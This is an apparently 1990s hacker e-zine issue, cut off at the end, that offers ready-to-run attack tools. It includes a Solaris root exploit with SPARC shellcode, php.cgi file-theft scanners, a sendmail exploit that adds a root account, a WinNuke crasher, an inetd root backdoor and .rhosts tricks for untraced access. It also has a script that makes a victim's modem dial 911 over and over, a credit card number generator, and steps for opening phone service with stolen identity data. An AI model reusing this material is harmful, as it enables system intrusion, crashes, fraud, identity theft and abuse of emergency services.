INTRO ]== =============================================================================== 1. Confidence Remains High Issue 002 : Tetsu Khan We have been very busy over the last 50 days, but we still managed to put together the CodeZero Remote Attack Kit, which contains some very cutting edge tools as well as some very optimised code, we have included all the programs precompiled to run from a Linux 2.0.x box, this way you dont even need a compiler to build this shit =) the source will be available when we can be bothered to put it on our page, so enjoy this second *FREE* issue of... ...Confidence Remains High! T_K One last thing, this issue is a BUMPER WWW hacking issue! because CERT and the IRT are cool, and they think I live in Sweden :) Heres a disclaimer, just in case anyone does get a bit annoyed : *************************************************************************** ** NONE OF THE DATA CONTAINED WITHIN THIS FILE IS TO BE USED UNETHICALLY ** ** USE THIS DATA AT YOUR OWN RISK AND DON'T COME CRYING TO US IF CERT ** ** COME ROUND YOUR HOUSE AND KICK YOUR FUCKING ASS, KILL YOUR PARENTS ** ** AND YOUR DOG AND CONFISCATE ALL YOUR SHIT. ** *************************************************************************** 2. wh0 the King? : so1o Okay, heres a rundown of the main groups and associations around the scene on the efnet at this moment in time, as well as some comments and members... r00t ==== Many say r00t own us, members include : aleph1 Veggie tfish As in, Aleph One of dfw.net and underground.org, Death Veggie of the cDc, Tweety Fish of the cDc Ninja Strike Force (I also heard he designed the NHC security) as well as ALOT of others who are very well known in the underground. r00t are definately the biggest group on the scene, and easily the most powerful. el8 === el8 is another very powerful group, with members that between them make el8 a force to be feared, members include : prym bw- tsal Overall, a good group, with some very smart people. The CodeZero ============ We d0nt like to talk about ourselves, boosted up to 7 men now :) The Secret Mouse Society (sms) ============================== I dont really know much of this groups true power, but members include... Calidor vertex vortex They have many shells traders, and therefore probably alot of influence in the shells world, as well as experience, quite a large group. I wont even talk about Undernet groups, seeing they continually split, join other groups, change names, rip other people code, shit like that, basically acting like 12 year old warez kiddies (take sIn for example, or maybe even Psychosis.) 3. www.codez.com : fr1day Yah000!!!@# wE gOt A dOmAin!!!@~# On www.codez.com we will have 40mb of space, this will include the following.. -=[ The Confidence Remains High Distro Point -=[ The CodeZero Exploits / Programs And Tools Page -=[ The Solaris 2.4 / 2.5.x Exploit Collection -=[ The Solaris Tools Collection -=[ The Solaris CodeZero Tools Collection -=[ The Linux 2.0.x Exploit Collection -=[ The Linux Tools Collection -=[ The Linux CodeZero Tools Collection -=[ W1nd0ze And d0S Tools Collection -=[ Assorted Text Philes Collection -=[ The CodeZero FTP Site -=[ H/P/A/V/C E-Zine Archive -=[ CodeZero Precompiled Linux / Solaris Tools And Exploits Archive So don't delay! GO THERE TODAY!@# And if you can, please link your sites to www.codez.com, as we would be very grateful :) Seeing we are basically giving all this shit to you for PHREE! phr1day =============================================================================== ==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]== =============================================================================== 1. Unpatched Solaris 2.3 / 2.4 Exploit : solsuid.c : Shawn Instenes /* If a tty port that is writeable by the user and owned by root is opened and the I_PUSH "ms" ioctl call made followed by an lseek the effective uid of the user is changed to root. */ #include #include #include #include #include #include #include main(argc, argv) int argc; char* argv[]; { int fd; if (argc < 2) { fprintf(stderr, "usage: %s /dev/ttyX\n", argv[0]); exit(1); } fd = open("/dev/ttyb", O_RDWR); printf("Your current effective uid is %d\n", geteuid()); ioctl(fd, I_PUSH, "ms"); lseek(fd, 0, 1); printf("Your effective uid has been changed to %d\n", geteuid()); } 2. Pretty Useful Solaris 2.5.1 Exploit : ban251.c : s0me bugtraq d00d /* Written for Solaris 2.5.1 (sunOS 5.5.1) with /bin/eject */ #include #include #include #include #define BUF_LENGTH 364 #define EXTRA 400 #define STACK_OFFSET 400 #define SPARC_NOP 0xa61cc013 u_char sparc_shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68" "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14" "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" "\x91\xd0\x20\x08" ; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA + 8]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode),dso=0; if(argc > 1) dso=atoi(argv[1]); long_p =(u_long *) buf ; targ_addr = get_sp() - STACK_OFFSET - dso; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ =targ_addr; printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); execl("/bin/eject", "eject", & buf[1],(char *) 0); perror("execl failed"); } 3. Scan For php Vunerable Servers : phpscan.c : so1o The next two programs, phpscan.c and phpget.c are fully compiled in the CodeZero Remote Attack Kit, details about the whole kit in section F, part 2. These two programs use a hole in the php.cgi code that allows remote users to read any file on the system that the http daemon has access to. Vunerable servers I have found include www.2600.com (FreeBSD 2.1), so it does have some effect, use phpscan.c to scan from a list of hosts, then phpget.c to retrieve files from the remote hosts. Here begins the c0de... /* phpscan.c : php.cgi vunerable server scanning program. Basically a modified phf scanner, by Alhambra of The Guild. Modifications to php.cgi by so1o of The CodeZero. Usage: phpscan */ #include #include #include #include #include #include #include #include #include #ifdef LINUX #include #endif #include #include #include #include #include #include int FLAG = 1; int Call(int signo) { FLAG = 0; } main (int argc, char *argv[]) { char host[100], buffer[1024], hosta[1024],FileBuf[8097]; int outsocket, serv_len, len,X,c,outfd; struct hostent *nametocheck; struct sockaddr_in serv_addr; struct in_addr outgoing; char PHPMessage[]="GET cgi-bin/php.cgi?/etc/passwd\n"; while(fgets(hosta,100,stdin)) { if(hosta[0] == '\0') break; hosta[strlen(hosta) -1] = '\0'; write(1,hosta,strlen(hosta)*sizeof(char)); write(1,"\n",sizeof(char)); outsocket = socket (AF_INET, SOCK_STREAM, 0); memset (&serv_addr, 0, sizeof (serv_addr)); serv_addr.sin_family = AF_INET; nametocheck = gethostbyname (hosta); (void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],sizeof (outgoing.s_addr)); strcpy (host, inet_ntoa (outgoing)); serv_addr.sin_addr.s_addr = inet_addr (host); serv_addr.sin_port = htons (80); signal(SIGALRM,Call); FLAG = 1; alarm(10); X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr)); alarm(0); if(FLAG == 1 && X==0){ write(outsocket,PHPMessage,strlen(PHPMessage)*sizeof(char)); while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X); } close (outsocket); } return 0; } 4. Use php To Get Files : phpget.c : p1 Heres the phpget.c, use it wisely...Some useful files to pull include... /etc/passwd /etc/hosts /etc/services /etc/syslogd.conf /etc/inetd.conf /* p1 (peewun@heterosexual.com) This code retrieves a file using php.cgi on a remote system. This program is for educational purposes only. Use it on p1.com. */ #include #include #include #include #include #include #include #include FILE *server; int sock; void do_connect(char *host, char *toget); void do_connect(char *host, char *toget) { char inbuf[1024]; struct sockaddr_in sin; struct hostent *hp; char *tmpbuf; hp = gethostbyname(host); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(80); sock = socket(AF_INET, SOCK_STREAM, 0); if ( -1 < connect(sock, (struct sockaddr *) &sin, sizeof(sin)) ) { printf("Made connection to %s.\n\n", host); } else { printf("Failed to connect to %s.\n\n",host); exit(0); } server=fdopen(sock, "a+"); fprintf(server, "GET /cgi-bin/php.cgi?%s\n",toget); printf("Output from php.cgi request:\n\n"); while(1){ if (fgets(inbuf, 1024, server) == NULL) break; printf(inbuf); } } main(int argc,char **argv) { printf("\nThis program retrieves files off a remote system using php.cgi.\n"); printf("Author: p1 - peewun@heterosexual.com\n"); if (argc < 3) { printf("Usage: %s \n",argv[0]); printf(" Ex: %s www.p1.com /etc/passwd\n",argv[0]); } else { char *buffer; (char *)"exit"; do_connect(argv[1],argv[2]); exit(1); } } 5. Hiding From Who : so1o Okay, bog standard easy shit, works on nearly all systems depending on security arrangements, I advise you always try this method first when trying to hide. DONT type the % signs !!!@~"!* ThEy ArE PrOmPtZ!!! Telnet into the system, then type... % cd % echo "+ +" >> .rhosts If this gives an error, like "Cannot create .rhosts" then try... % cd % echo "+ +" > .rhosts Next telnet to the machines EXACT address, not 127.0.0.1 or localhost, this way works the most effectively..as it says "last login from..." and you don't want your ip to be mentioned, or for anyone to get suspicious, so you will need to cover your tracks. % telnet machine.host.com (then log in again, using the same L/P) now exit completely, using exit twice. The system is now all set up for you to log in without being seen or logged, as the + + you echo to the .rhosts file in the users home directory is actually used so that you can remotely execute commands on the system using rsh, or login into the system remotely, using rlogin, neither operations require a password, just a login name, so if the user changes his password, you will still be able to use this technique, now we can attempt to log into the system untraced, for this we need to either run linux, or be in a shell, follow this one, easy step, replace "login" with your login, and host.com with the EXACT host you want to get into... % rsh -l login host.com csh -i eg... % rsh -l tetsu microsoft.com csh -i This then runs csh (c shell) on the remote host (microsoft) in interactive mode..you should see something like this... % rsh -l tetsu microsoft.com csh -i ...Thus no control on this tty, blah blah blah % Now you are in, type who : % who % w00 w00!! no-one seems to be logged in, and you are therefore hidden!! Now you can proceed to hack the host without having to worry whos watching you. Note : Systems Administrators often look over their users directories for .rhosts files, so be aware of that. 6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit : p1 If modeX would have given us his 884 REMOTE exploit with all the offsets, then we would have published it, but he didn't, so we ain't :( Have the local version instead... #!/bin/bash clear echo echo Sendmail 8.8.4 and 8.8.5 local exploit. echo Scripting by p1 \(peewun@heterosexual.com\) on 4-15-97. echo if [ $1 = "-rm" ] then echo Removing /var/tmp/dead.letter echo rm -rf /var/tmp/dead.letter echo Attempting to continue with exploit. echo fi if [ -e /var/tmp/dead.letter ] then echo File exists: /var/tmp/dead.letter echo echo If you wish to run this exploit, please delete it by running this echo exploit with the -rm flag. echo exit fi ln -s /etc/passwd /var/tmp/dead.letter cat >> unf << _EOF_ helo mail from: very@bad.address.here rcpt to: another@bad.bad.address data owned::0:0:exploitation:/:/bin/sh . _EOF_ cat unf | telnet localhost 25 >> /dev/null rm -rf unf echo echo Please wait for dead.letter to possibly be appended to by sendmail. echo sleep 10 if grep exploitation /etc/passwd then echo Successful addition of account 'owned' to /etc/passwd, running 'su.' su owned else echo Unsuccessful exploitation of symbolic link bug. fi 7. Ident Scanner : ident-scan.c : Dave Goldsmith Very very useful and quick tool, especially if it finds daemons running as root that shouldn't be...Or even backdoors on high ports. Usage : ident-scan [low port] [high port] /* * ident-scan [v0.15] * This TCP scanner has the additional functionality of retrieving * the username that owns the daemon running on the specified port. * It does this by by attempting to connect to a TCP port, and if it * succeeds, it will send out an ident request to identd on the * remote host. I believe this to be a flaw in the design of the * protocol, and if it is the developers intent to allow 'reverse' * idents, then it should have been stated clearer in the * rfc(rfc1413). * * USES: * It can be useful to determine who is running daemons on high ports * that can be security risks. It can also be used to search for * misconfigurations such as httpd running as root, other daemons * running under the wrong uids. * * COMPILES: Compiles fine under Linux, BSDI and SunOS 4.1.x. * * Dave Goldsmith * */ #include #include #include #include #include #include #include #include #include enum errlist { BAD_ARGS,BAD_HOST,NO_IDENT,SOCK_ERR }; void usage(error) enum errlist error; { fprintf(stderr,"ident-scan: "); switch(error) { case BAD_ARGS: fprintf(stderr,"usage: ident-scan hostname [low port] [hi port]\n"); break; case BAD_HOST: fprintf(stderr,"error: cant resolve hostname\n"); break; case NO_IDENT: fprintf(stderr,"error: ident isnt running on host\n"); break; case SOCK_ERR: fprintf(stderr,"error: socket() failed\n"); break; } exit(-1); } struct hostent * fill_host(machine,host) char *machine; struct hostent *host; { if ((host=gethostbyname(machine))==NULL) { if ((host=gethostbyaddr(machine,4,AF_INET))==NULL) return(host); } return(host); } int main(argc,argv) int argc; char **argv; { struct sockaddr_in forconnect,forport,forident; int i,sockfd,identfd,len=sizeof(forport),hiport=9999,loport=1,curport; struct servent *service; struct hostent *host; char identbuf[15], recieved[85], *uid; if ((argc<2) || (argc>4)) usage(BAD_ARGS); if (argc>2) loport=atoi(argv[2]); if (argc>3) hiport=atoi(argv[3]); if ((host=fill_host(argv[1],host))==NULL) usage(BAD_HOST); forconnect.sin_family=host->h_addrtype; forconnect.sin_addr.s_addr=*((long *)host->h_addr); forident.sin_family=host->h_addrtype; forident.sin_addr.s_addr=*((long *)host->h_addr); forident.sin_port=htons(113); if ((identfd=socket(AF_INET,SOCK_STREAM,0))== -1) usage(SOCK_ERR); if ((connect(identfd,(struct sockaddr *)&forident,sizeof(forident)))!=0) usage(NO_IDENT); close(identfd); for(curport=loport;curport<=hiport;curport++) { for(i=0;i!=85;i++) recieved[i]='\0'; forconnect.sin_port=htons(curport); if ((sockfd=socket(AF_INET,SOCK_STREAM,0))== -1) usage(SOCK_ERR); if (connect(sockfd,(struct sockaddr *)&forconnect,sizeof(forconnect))==0) { if (getsockname(sockfd,(struct sockaddr *)&forport,&len)==0) { if ((identfd=socket(AF_INET,SOCK_STREAM,0))== -1) usage(SOCK_ERR); if (connect(identfd,(struct sockaddr *)&forident,sizeof(forident))==0) { sprintf(identbuf,"%u,%u",htons(forconnect.sin_port), htons(forport.sin_port)); write(identfd,identbuf,strlen(identbuf)+1); read(identfd,recieved,80); recieved[strlen(recieved)-1]='\0'; uid=strrchr(recieved,' '); service=getservbyport(forconnect.sin_port,"tcp"); printf("Port: %3d\tService: %10s\tUserid: %s\n",curport, (service==NULL)?"(?)":service->s_name,uid); } } } close(sockfd); close(identfd); } } 8. Windoze NT / 95 Killer : winnuke.c : _eci /* winnuke.c - (05/07/97) By _eci */ /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */ #include #include #include #include #include #include #include #define dport 139 /* Attack port: 139 is what we want */ int x, s; char *str = "Bye"; /* Makes no diff */ struct sockaddr_in addr, spoofedaddr; struct hostent *host; int open_sock(int sock, char *server, int port) { struct sockaddr_in blah; struct hostent *he; bzero((char *)&blah,sizeof(blah)); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(server); blah.sin_port=htons(port); if ((he = gethostbyname(server)) != NULL) { bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length); } else { if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) { perror("gethostbyname()"); return(-3); } } if (connect(sock,(struct sockaddr *)&blah,16)==-1) { perror("connect()"); close(sock); return(-4); } printf("Connected to [%s:%d].\n",server,port); return; } void main(int argc, char *argv[]) { if (argc != 2) { printf("Usage: %s \n",argv[0]); exit(0); } if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket()"); exit(-1); } open_sock(s,argv[1],dport); printf("Sending crash... "); send(s,str,strlen(str),MSG_OOB); usleep(100000); printf("Done!\n"); close(s); } =============================================================================== ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]== =============================================================================== 1. Federal Bugging Frequencies : Weapon-X Commonly Used by Federal Agencies for Bugs, Wireless Microphones, and Body Wires (also 138-220 mhz, and 399-420 mhz, under 25-50 mw). 149.3500, 165.9125, 167.3375, 167.3425, 167.4875, 168.0115, 169.2000, 169.4450, 169.5050, 170.2450, 170.3050, 171.0450, 171.1050, 171.4500, 171.6000, 171.7500, 171.8450, 171.8500, 171.9050, 172.0000, 172.2000, 172.2125, 172.2375, 172.2625, 172.2875, 172.3125, 172.3375, 172.3625, 172.3875, 172.5500 173.3375 169.445, 169.505, 170.245, 170.305, 171.045, 171.105, 171.845, 171.905 27.5750 Customs Low Power < 5 watts 27.5850 Customs Low Power < 5 watts 163.1000 Customs Low Power < 30 watts 418.5750 Customs Low Power < 30 watts 40.1200 Federal Shared Mobile Locator Tranmitters "Bumper Beepers" 40.1700 Federal Shared Mobile Locator Tranmitters "Bumper Beepers" 40.2200 Federal Shared Mobile Locator Tranmitters "Bumper Beepers" 40.2700 Federal Shared Mobile Locator Tranmitters "Bumper Beepers" 164.9125 FBI Surveillance 165.9125 ATF F5 Surveillance 166.2875 ATF 170.4125 ATF 407.8000 Secret Service 406.2750 Secret Service 408.5000 Secret Service 408.9750 Secret Service 172.2000 DOJ/DEA CH.1 171.6000 DOJ/DEA CH.2 418.0500 DEA Low Power 418.0750 DEA Low Power 418.5750 DEA Low Power 418.7500 DEA 418.6750 DEA 418.9000 DEA F2 CINDY (416.325) Surveillance 418.7500 DEA F3 GAIL Surveillance/Strike Force 418.6750 DEA F4 EMILY (416.325) Surveillance 407.8000 CIA, State Department 408.0500 Federal Shared 408.5750 Federal Shared 409.4000 Federal Shared 960-1215mhz Spread Spectrum Systems (Wideband) Generally Recognized Federal Bug/Spy Bands Primary - 25-50mhz, 135-175mhz, 225-440mhz, 1710-1950mhz, 8.3-12.5ghz Secondary - 890mhz-5.50ghz, 7.0-9.5ghz, 10-39.6ghz Also, Wide Band Frequency Hopping centered on various UHF-TV channels (ie: 510 or 670 mhz with a hopping width of +/- 25 mhz) Keep in mind that the federal government can use virtually any frequency between DC and light. So get scanning now!! 2. 911 Autodialler Script : dk Okay, scenario... Your Friend g1mpfuck is on his linux system, you have never really liked him, and he has gone out to someplave for a few hours, to be back this evening... If you root his system, and run this, his modem will dial 911 every 10 mins, but as soon as you do run it, it will kill the pppd and dial the number, so if he's on IRC, then he will quit... Here it is! Read the instructions in the code first... #!/bin/sh # 911-autodial.sh # # for use with linux boxes running DIP. # dials 911 every ten minutes, and if the user is using pppd # it kills pppd in order to place the call. # IMPORTANT!!! # add this line to root's crontab with: crontab -e root # 2,12,22,32,42,52 * * * * /path/to/911-autodial.sh # note: this assumes the modem device is: /dev/modem # if it is otherwise change "port modem" to # "port cua1" or whatever the modem device is # although it is usally /dev/modem. echo " get $local 0.0.0.0" >> /tmp/911.dip echo " get $remote 0.0.0.0" >> /tmp/911.dip echo " port modem" >> /tmp/911.dip echo " speed 38400" >> /tmp/911.dip echo " reset" >> /tmp/911.dip echo " send ATQ0V1E1X4\r" >> /tmp/911.dip echo " wait OK 2" >> /tmp/911.dip echo " dial 911" >> /tmp/911.dip ps -aux|grep pppd|grep -v grep >> /tmp/ppp-check grep "^root" /tmp/ppp-check > /dev/null 2>&1 if [ $? -ne 0 ] ; then echo "PPP IS DEAD" > /tmp/ppp-dead fi if [ -f /tmp/ppp-dead ]; then /sbin/dip /tmp/911 rm /tmp/ppp-* rm /tmp/911.dip exit 1 fi kill `ps -ax|grep pppd|grep -v grep|awk 'BEGIN {FS=" ";OFS=" "} {print $1}` /sbin/dip /tmp/911 rm /tmp/ppp-* rm /tmp/911.dip exit 1 3. Cellular Calls Without Cloning : TRON There are several ways to make free calls with a cellular phone that does not have service with the hassle of cloning it, or if you have a phone that can't be cloned or you don't want to buy the expensive equipment required, so here are a few ways to do it from home with little risk... 1.) American Roaming Network. ----------------------------- To reach the American Roaming Network (or something like it, depending on where you are), put your phone on the alternate carrier side so it says roam, then dial 0 and it should tell you your call is being forwarded. At that point you should be connected to an automated system, form here you have a couple of billing options... To use a credit or calling card, you enter the area code and number you want to call; for a calling card you then enter the card number and pin, for a credit card you then enter the card number and expirarion date, then the zip code of the billing address. ARN takes MasterCard, American Express, and most local and long distance company calling cards. They say they dont take VISA anymore, but I've gotten them to work on the automated system. If the number you call is busy or doesn't answer, you can press * and then either leave a message that the system will deliver, or try another number. If you want to dial another number you will have to put the zip code again after the new number. You can also make collect and 3rd party billed calls by dialing 0 instead of the number to call when you connect to ARN. You will be sent to an operator, tell them you would like to place a call. They will then ask how you would like to bill it. You can set up a local dialup voice mail box and change the greeting so it sounds like someone's there to accept the charges, the operator has to read a script, so you have to adjust the timing to get it just right. ARN will not 3rd party or collect bill to 800 numbers, nor will they place calls to 800 numbers charged to 3rd party numbers. 2.) Social Engineering. ----------------------- Another way is to dial 611 and tell the customer support person that you're having trouble getting through to the area you're trying yo call and could they try place the call for you. This works about 50% of the time, it helps to have the name and cell number of someone who has service with that provider in case they ask for it, they might ask for the social security number too, so be prepared, dumpster diving at a cell store is the easiest place to get that info. 3.) Set Up Service With Someone Else's Info. -------------------------------------------- The best way, and the one I prefer to cloning, is to get someone else's information and set up service. The best place to get the information you'll need is from a place that does credit checks, like a bank or car dealership. Make sure they have a good rating, like A, B or C, then you wont be asked for a deposit. You'll need a name, address, social security number, drivers license number and work number. You will also need a cell phone that is not stolen. They will not activate a stolen phone, when I tried they put me on hold and called the person who's phone I had and then told me the person wanted me to mail the phone back to them. Also find and write down the electronic serial number, you'll need that too. You then need to call a local cell service provider (ie. GTE MobilNet, Cellular One, Bell South Mobility, etc.) on a phone you have. Let them tell you about the different service plans and pick one. They will then ask for your "information" and ESN. Then they will ask to call you back with your new cell number, tell them that you're out and ask for a number to call them back at, they will have no problem with this. Then call them back and they will tell you how to program your new number into your phone, they might also tell you how to program in a new system ID and pagin channel etc, this is no big deal. Also ask when the billing cycle ends and when the bill is sent out, you will want to stop using this number when the person you're billing it to gets their bill. Be sure to get call features like 3-way and call forwarding, they're always useful to have. I prefer this to cloning because its less worry and hassle and it lasts up to a month. =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== 1. Getting Your Exploits Onto Systems : so1o You want to get files or exploits onto another system, you can do this the following few ways... 1) Mail The User The File. -------------------------- This method is simple, easy to do, pretty undetectable, but sometimes may be a touch too slow, depending on the location / speed of the system...just mail login@host.com the file or whatever, then wait at the other side for them to get it. 2) FTP to the system. ---------------------- Using an FTP client, you can FTP to the remote server from your system, then upload the files to the server, but you will most probably get logged, and so if your exploits fail, this may not be such a good idea... 3) Use cat to input the file from the terminal. ----------------------------------------------- This is easy to do, pretty quick and effective, follow these steps... FearFactory:~:$ cat > heh.c << STOP #include main() { printf("Quit Laughin' At Yerself Yew Gimp :P\n"): } STOP FearFactory:~:$ cat heh.c #include main() { printf("Quit Laughin' At Yerself Yew Gimp :P\n"): } FearFactory:~:$ cc -o heh heh.c FearFactory:~:$ heh Quit Laughin' At Yerself Yew Gimp :P FearFactory:~:$ I used "cat > filename.c << STOP" to input the file from the terminal, I could have cut a file from another editor, then just pasted it to the terminal, then when I type "STOP" and hit enter, cat stops taking input from the terminal and EOF's the file...Then I cat it again, to prove that the STOP does not stay as part of the file, then I proceed to compile the source using cc and then I run the program, easy =) Always remember to remove traces of exploits from the system if you fail, as this is messy and could lead to the admin becoming suspicious, just keep your technique clean, and you will learn some good skills... Recommended Reading : --------------------- LINUX IN A NUTSHELL - A Desktop Quick Reference By Jessica Perry Hekman Copyright 1997 O'Reilly & Associates ISBN 1-56592-167-4 UK : 14.99 US : $19.95 CAN : $28.95 I really like this book, its very easy to use, pretty compact, and 424 pages long, the information in it will boost your skills by a long way if you are a newbie, and there are alot of more advanced features, such as debugfs and many other programs and their syntax. Basically its a dictionary of Linux commands, along with a short explanation, the syntax for the command and many examples, I have the first printing, which is January 1997, so this book is not old at all, and pretty up-to-date... 2. Fakemailing Techniques : so1o Fakemailing is old and very very easy to do. To use this simple fakemailing program just make a file, such as letter.txt with the stuff you want to send in it, like "Hey Bill! how's it going?" or whatever. Next compile the fakemail.c using gcc -o sendfake sendfake.c ignore any warning messages. Run the program using "sendfake" and follow the steps, simple as that =) /**********************************************************/ /* SENDFAKE.C */ /* */ /* */ /* Author: asm@quantum.syspac.com */ /* */ /* To compile: gcc -o sendfake sendfake.c */ /* Usage : sendfake */ /* */ /**********************************************************/ #include #include #include #include #include #include #include #include #define MAXLEN 256 int s; int call_socket(char *hostname) { struct sockaddr_in sa; struct hostent *hp; int a, s; if ((hp=gethostbyname(hostname))==NULL) return(-1); bzero(&sa, sizeof(sa)); bcopy(hp->h_addr, (char *)&sa.sin_addr, hp->h_length); sa.sin_family = hp->h_addrtype; sa.sin_port = htons((u_short)25); if((s=socket(hp->h_addrtype, SOCK_STREAM, 0)) < 0) return(-1); if(connect(s, &sa, sizeof(sa)) < 0) { close(s); return(-1); } return(s); } int readln(char *buf) { int to=0; char c; do { if(read(s, &c, 1)<1) return(0); if((c >= ' ') || (c <= 126)) if(to",from); writeln(str); readln(buf); do { input("Send fake mail TO",to); sprintf(str, "RCPT TO: <%s>",to); writeln(str); readln(buf); *(buf+3) = 0; if(atoi(buf) == 250) break; else printf("%s",buf+4); } while(1); input("Name of lamer getting the fake mail",name); input("Subject of fake mail",subject); writeln("DATA"); sprintf(str,"To: %s <%s>",name,to); writeln(str); if(strlen(subject)) { sprintf(str, "Subject: %s", subject); writeln(str); } do { input("File to read and include in fake mail",str); if(!strlen(str)) { close(s); exit(1); } if((fp = fopen(str,"rt")) == NULL) printf("Could not find file %s\n", str); else break; } while(1); while(fgets(str,MAXLEN,fp)) write(s, str, strlen(str)); writeln("\n.\n"); readln(buf); writeln("QUIT\n"); printf("Sent!!!\n"); close(s); } 3. Pascal Credit Card Generator Source : Lobster Guacamole PROGRAM ccnum; { Written by Lobster Guacamole. } { } { I wrote this program because I enjoy fucking over every goddam bureacratic } { and/or facist aspect of our society. This program simply spits out ten } { random credit card numbers based on the bank prefix used. See lines 58 } { through 61 for information on the bank prefix used. There is also a lame } { password feature for minor security. See lines 42 through 50 for } { information on the password feature. } { } { Remember, however, the numbers that are spit out may not work because } { the credit card company may not have assigned that number to a customer } { yet. Have fun! } { } { You can use a simple program like pas2c to translate this code into c } { - Tetsu Khan } USES Crt; VAR ccnum_count : Integer; PROCEDURE program_init; BEGIN Randomize; CheckBreak := False; END; PROCEDURE show_title; BEGIN ClrScr; Writeln; Writeln( 'CCNUM - Credit Card Number Generator.' ); Writeln( 'Written by Lobster Guacamole.' ); Writeln; END; PROCEDURE get_pwd; VAR program_pwd : String; BEGIN Writeln; Write( 'Enter password>' ); Readln( program_pwd ); IF program_pwd = 'a' THEN { The current password is a lower case } BEGIN { letter 'a'. Recompile the program if } Writeln; { you change the password, of course. } Writeln( 'Correct' ); { Change password on line 47 as well. } Writeln; END; IF program_pwd <> 'a' THEN { If you changed the password on line 40, } BEGIN { change it here, too. } Writeln; Writeln( 'Incorrect' ); Halt; END; END; PROCEDURE make_ccnum; VAR ccnum_digits : ARRAY[ 1..16 ] OF Integer; doub_odd_digits : ARRAY[ 1..8 ] OF Integer; digit_count : Integer; yn_choice : Char; added_digits : Integer; BEGIN ccnum_digits[1] := 5; { This part may have to be changed depending } ccnum_digits[2] := 4; { on the bank prefix used. The bank prefix } ccnum_digits[3] := 2; { here is '5424', the prefix for Citibank. } ccnum_digits[4] := 4; { Recompile the program if you change it. } REPEAT FOR digit_count := 5 TO 16 DO BEGIN ccnum_digits[ digit_count ] := Random(10); END; doub_odd_digits[1] := 2 * ccnum_digits[1]; IF doub_odd_digits[1] > 9 THEN doub_odd_digits[1] := doub_odd_digits[1] - 9; doub_odd_digits[2] := 2 * ccnum_digits[3]; IF doub_odd_digits[2] > 9 THEN doub_odd_digits[2] := doub_odd_digits[2] - 9; doub_odd_digits[3] := 2 * ccnum_digits[5]; IF doub_odd_digits[3] > 9 THEN doub_odd_digits[3] := doub_odd_digits[3] - 9; doub_odd_digits[4] := 2 * ccnum_digits[7]; IF doub_odd_digits[4] > 9 THEN doub_odd_digits[4] := doub_odd_digits[4] - 9; doub_odd_digits[5] := 2 * ccnum_digits[9]; IF doub_odd_digits[5] > 9 THEN doub_odd_digits[5] := doub_odd_digits[5] - 9; doub_odd_digits[6] := 2 * ccnum_digits[11]; IF doub_odd_digits[6] > 9 THEN doub_odd_digits[6] := doub_odd_digits[6] - 9; doub_odd_digits[7] := 2 * ccnum_digits[13]; IF doub_odd_digits[7] > 9 THEN doub_odd_digits[7] := doub_odd_digits[7] - 9; doub_odd_digits[8] := 2 * ccnum_digits[15]; IF doub_odd_digits[8] > 9 THEN doub_odd_digits[8] := doub_odd_digits[8] - 9; added_digits := doub_odd_digits[1] + doub_odd_digits[2] + doub_odd_digits[3] + doub_odd_digits[4] + doub_odd_digits[5] + doub_odd_digits[6] + doub_odd_digits[7] + doub_odd_digits[8] + ccnum_digits[2] + ccnum_digits[4] + ccnum_digits[6] + ccnum_digits[8] + ccnum_digits[10] + ccnum_digits[12] + ccnum_digits[14] + ccnum_digits[16]; UNTIL added_digits MOD 10 = 0; Writeln( ' ', ccnum_digits[1], ccnum_digits[2], ccnum_digits[3], ccnum_digits[4], ' ', ccnum_digits[5], ccnum_digits[6], ccnum_digits[7], ccnum_digits[8], ' ', ccnum_digits[9], ccnum_digits[10], ccnum_digits[11], ccnum_digits[12], ' ', ccnum_digits[13], ccnum_digits[14], ccnum_digits[15], ccnum_digits[16] ); END; BEGIN program_init; show_title; get_pwd; FOR ccnum_count := 1 TO 10 DO make_ccnum; END. 4. in.courierd : backdoor on port 530 : so1o As root do the following (without the %'s ;]) to setup the backdoor. -------------------------------------------------------------------- [This Method Has Been Tested On A Linux 2.0.30] % cp /bin/bash /usr/sbin/in.courierd % chmod 4755 /usr/sbin/in.courierd [optional, depends on system] % echo "courier stream tcp nowait root /usr/sbin/in.courierd" >> /etc/inetd.conf % /sbin/pidof inetd.conf [to find the pid of inetd.conf] % kill -HUP [replace the with the real pid] % telnet localhost 530 [test backdoor] All commands to the backdoor must end with ;, for example.... exit; ps -a; whoami; cd /; You are root when you use the backdoor, and you are not seen or logged. The last time I used this, it stayed up for 2 weeks =) The above commands I have tested in Linux, I have heard that you have to reboot a Sun for the new settings to take effect (shutdown -r now). But hey! its only a prototype at the moment until I make it cool and alot better =) Have fun. so1o 5. UK Laws On Computer Misuse : Darkfool This part is actually useful info, not like Darkfools 